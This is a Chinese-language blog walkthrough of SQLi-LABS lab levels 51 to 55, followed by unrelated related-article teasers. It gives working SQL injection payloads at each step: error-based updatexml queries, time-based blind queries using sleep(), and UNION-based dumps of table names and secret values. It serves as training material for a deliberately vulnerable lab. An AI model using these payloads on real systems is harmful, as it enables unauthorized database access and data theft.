SQLi-LABS靶场51-55通过攻略

news2025/11/10 1:59:29

less-51

1.判断注入点

?sort=1'  加上单引号会引起报错

2.判断闭合方式

?sort=1'--+  可以闭合成功

3.查询数据库名

使用报错注入查询

?sort=1' and updatexml(1,concat(1,database()),1)--+

4.查询数据库的所有表

?sort=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+

5.查询users表的所有字段

?sort=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)--+

less-52

1.判断注入点

正常页面

错误页面?sort=1' --+ 说明存在注入

2.判断数据库长度

?sort=1 and if(length(database())>7,sleep(3),1) --+ 发现页面有延迟

?sort=1 and if(length(database())>8,sleep(3),1) --+ 发现页面没有延迟 说明数据库长度=8

3.查询数据库名

?sort=1 and if((ascii(substr(database(),1,1))>114),sleep(3),1),页面延时三秒

?sort=1 and if((ascii(substr(database(),1,1))>115),sleep(3),1),页面没有延迟 说明第一位字符的ASCII码=115  也就是s 

以此类推 可以得出数据库名为security

less-53

这一关同第52关一样 都是使用时间盲注 唯一的区别是这一关闭合方式是单引号闭合

less-54

1.判断注入点

?id=1' 页面显示不正常

2.判断闭合方式

?id=1'--+  闭合成功

3.判断页面回显点

?id=-1' union select 1,2,3--+

4.查询数据库名

?id=-1' union select 1,database(),3--+

5.查询数据库的所有表

?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),3--+

4.查询表的所有字段

?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='jqwz3m0yo4'),3--+

6.查询表的所有内容

?id=-1' union select 1,2,(select group_concat(id,'/',sessid,'/',secret_C0NE,'/',tryy) from jqwz3m0yo4)--+

选择secret_c0ne的内容提交即可

less-55

1.判断闭合方式

?id=1) --+ 发现是括号闭合

2.查看页面回显点

?id=-1) union select 1,2,3--+

3.查询数据库

?id=-1) union select 1,database(),3--+

4.查询数据库的所有表

?id=-1) union select 1,(select table_name from information_schema.tables where table_schema='challenges'),3--+

5.查询表的所有字段

?id=-1) union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='nqnk5uf9gb')--+

6.查询表的所有内容

?id=-1) union select 1,2,(select group_concat(secret_OTNI) from nqnk5uf9gb)--+

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2094837.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

中锂天源:卡车锂电池的领跑者

中锂天源:卡车锂电池的领跑者

随着新能源产业的飞速发展,卡车锂电池市场也呈现出旺盛的生命力。在我国锂电池产业中,中锂天源作为一家专注于新能源锂电池研发与制造的企业,成为了卡车锂电池领域的佼佼者。 中锂天源卡车锂电池采用先进的锂电池技术,具有安全性…
阅读更多...
Linux:网络编程之TCP/IP模型,UDP协议

Linux:网络编程之TCP/IP模型,UDP协议

一、OSI模型七层结构 OSI(Open Systems Interconnection)模型,即开放系统互连参考模型,是一个概念性框架,用于促进全球通信。它定义了网络通信的七层结构,每一层都执行特定的功能,并且每一层都使…
阅读更多...
25考研人数预计下降?这一届考研有哪些新趋势?

25考研人数预计下降?这一届考研有哪些新趋势?

2025年考研时间线: 2024年9月:公共课及各院校考试大纲公布; 2024年9月下旬:预报名; 2024年10月:正式报名; 2024年11月:线上/线下确认; 2024年12月中下旬&#xff1a…
阅读更多...
腾讯版GPT-4o平替方案:VITA

腾讯版GPT-4o平替方案:VITA

引言 庙内无僧风扫地,寺中少灯月照明。 小伙伴们好,我是微信公众号《小窗幽记机器学习》的小编:买黑神话的小男孩,紧接卖黑神话的小女孩的小作文,今天这篇小作文主要介绍腾讯开源(截至2024年8月25日尚未真正开源&…
阅读更多...
【软考】数字签名

【软考】数字签名

目录 1. 说明2. 过程2.1 数字签名过程2.2 数字加密过程 3. 公开密钥4. 报文加密5. 例题5.1 例题1 1. 说明 1.书信或文件是根据亲笔签名或印章来证明其真实性。2.在计算机网络中传送的文电用数字签名来解决问题。3.数字签名必须保证三点:接收者能够核实发送者对报文…
阅读更多...
[C语言]第八节 数组一基础知识到高级技巧的全景探索

[C语言]第八节 数组一基础知识到高级技巧的全景探索

目录 8.1 数组概念的引入 8.2.⼀维数组的创建和初始化 8.2.1 数组的创建 8.2.2数组的初始化 8.2.3 数组的类型 8.3 ⼀维数组的使⽤ 8.3.1 数组下标 8.3.2 打印数组元素 8.3.3 输入数组元素 8.4 ⼀维数组在内存中的存储 8.5 sizeof计算数组元素个数 8.5.1 sizeof 关键…
阅读更多...
第4章-05-用WebDriver下载页面csv到本地

第4章-05-用WebDriver下载页面csv到本地

🏆作者简介,黑夜开发者,CSDN领军人物,全栈领域优质创作者✌,CSDN博客专家,阿里云社区专家博主,2023年CSDN全站百大博主。 🏆数年电商行业从业经验,历任核心研发工程师,项目技术负责人。 🏆本文已收录于专栏:Web爬虫入门与实战精讲,后续完整更新内容如下。 文章…
阅读更多...
Java 入门指南:Java 并发编程 —— JMM Java内存模型

Java 入门指南:Java 并发编程 —— JMM Java内存模型

JMM(Java Memory Model,Java 内存模型)(抽象模型)是用来描述和控制多线程之间内存可见性、有序性、原子性、指令重排等问题的规范。 JMM 定义了一组规则,规定了在多线程环境下,线程在执行共享变…
阅读更多...
尚品汇-MQ模块搭建测试、消息不丢失(重)(四十三)

尚品汇-MQ模块搭建测试、消息不丢失(重)(四十三)

目录: (1)消息不丢失 (2)消息确认 (3)消息确认业务封装 (4)封装发送端消息确认 (5)封装消息发送 (6)发送确认消息测试…
阅读更多...
【C#】Visual Studio 2017开发C#,按F1键没有跳转到C#帮助文档,反而跳到了Qt的帮助文档

【C#】Visual Studio 2017开发C#,按F1键没有跳转到C#帮助文档,反而跳到了Qt的帮助文档

1. 原因 Visual Studio中安装了Qt的插件,所以将F1的跳转链接转到了Qt的帮助文档。 2. F1改回微软帮助文档方法 工具 - 选项 - Qt - General - Try Qt Documentation when F1 is pressed改为Flase
阅读更多...
Web服务端通过SSE推送消息给浏览器客户端的实现方案(附详细代码和仓库地址)

Web服务端通过SSE推送消息给浏览器客户端的实现方案(附详细代码和仓库地址)

目录 1、SSE(Server-Sent Events)简介2、SSE 的工作原理3、SSE 与客户端轮询的区别和优势比较区别优势 4、SSE简单实现(单机应用Demo)演示效果SSE-Demo仓库地址下面直接贴代码:前端实现:后端实现: 5、SSE简单实现(分布…
阅读更多...
【pycharm】汉化及翻译插件

【pycharm】汉化及翻译插件

汉化插件 翻译插件 使用 选中右键翻译
阅读更多...
一键解决LBP2900通信错误的问题(同样支持Win 11系统)

一键解决LBP2900通信错误的问题(同样支持Win 11系统)

**目录** **前言****常见解决方式****方案一:端口排除****方案二:服务重启****方案三:注册表注入修复** 前言 佳能LBP2900向来是经典耐用款的打印机。想必各位可能遇到过,由于老旧会出现奇葩的问题,譬如 就算USB接口已…
阅读更多...
【C++篇】~类和对象(上)

【C++篇】~类和对象(上)

【C篇】 类和对象上 一类二实例化内存对齐原因(用空间换时间,提高效率) 一类 ‘类’class可以理解为C语言阶段的‘结构体’,它的用法与struct大差不差很多地方都相同,但是C毕竟是C,类的用法肯定比结构体的…
阅读更多...
Linux Kernel 6.12版预计将支持在崩溃后显示二维码 后续可以解码排查错误

Linux Kernel 6.12版预计将支持在崩溃后显示二维码 后续可以解码排查错误

7 月份时红帽工程师基于 systemd 255 版的全屏显示错误消息功能为 Linux Kernel 开发崩溃后显示二维码选项,这与微软在 Windows 10/11 蓝屏死机后显示二维码有异曲同工之妙。 不过 Linux 与 Windows 在崩溃时显示的二维码内容则有本质区别,因为 Window…
阅读更多...
单链表反转(C语言)

单链表反转(C语言)

1 问题描述 力扣(LeetCode)--反转链表 给你单链表的头节点 head ,请你反转链表,并返回反转后的链表。 例如: 输入:head [1,2,3,4,5]输出:[5,4,3,2,1] 输入:head [1,2]输出&#x…
阅读更多...
11 Java 方法引用、异常处理

11 Java 方法引用、异常处理

文章目录 前言一、Java接口之函数式编程 --- 接口知识补充1 Function<T,R>泛型接口2 BiFunction<T, U, R>泛型接口3 自定义泛型函数式编程接口 二、方法引用1 方法引用初体验&#xff08;以Array.sort()方法为例&#xff09;2 引用静态方法3 引用其他类成员方法 前…
阅读更多...
【面试五】PID控制算法

【面试五】PID控制算法

一、 PID算法简介 PID&#xff08;Proportional-Integral-Derivative&#xff09;控制算法是一种经典的反馈控制方法&#xff0c;广泛应用于自动控制系统&#xff0c;例如温度控制、速度控制、位置控制等。 PID控制算法的核心包含三个部分&#xff1a;比例项&#xff08;P&…
阅读更多...
@antv/g6 业务场景:流程图

@antv/g6 业务场景:流程图

1、流程图是流经一个系统的信息流、观点流或部件流的图形代表。在企业中&#xff0c;流程图主要用来说明某一过程。这种过程既可以是生产线上的工艺流程&#xff0c;也可以是完成一项任务必需的管理过程。业务场景流程图如下&#xff1a; 2、绘制流程图的 Tips 流程图一般是用…
阅读更多...
计算机毕业设计选题推荐-果树生长信息管理系统-Java/Python项目实战

计算机毕业设计选题推荐-果树生长信息管理系统-Java/Python项目实战

✨作者主页&#xff1a;IT毕设梦工厂✨ 个人简介&#xff1a;曾从事计算机专业培训教学&#xff0c;擅长Java、Python、微信小程序、Golang、安卓Android等项目实战。接项目定制开发、代码讲解、答辩教学、文档编写、降重等。 ☑文末获取源码☑ 精彩专栏推荐⬇⬇⬇ Java项目 Py…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023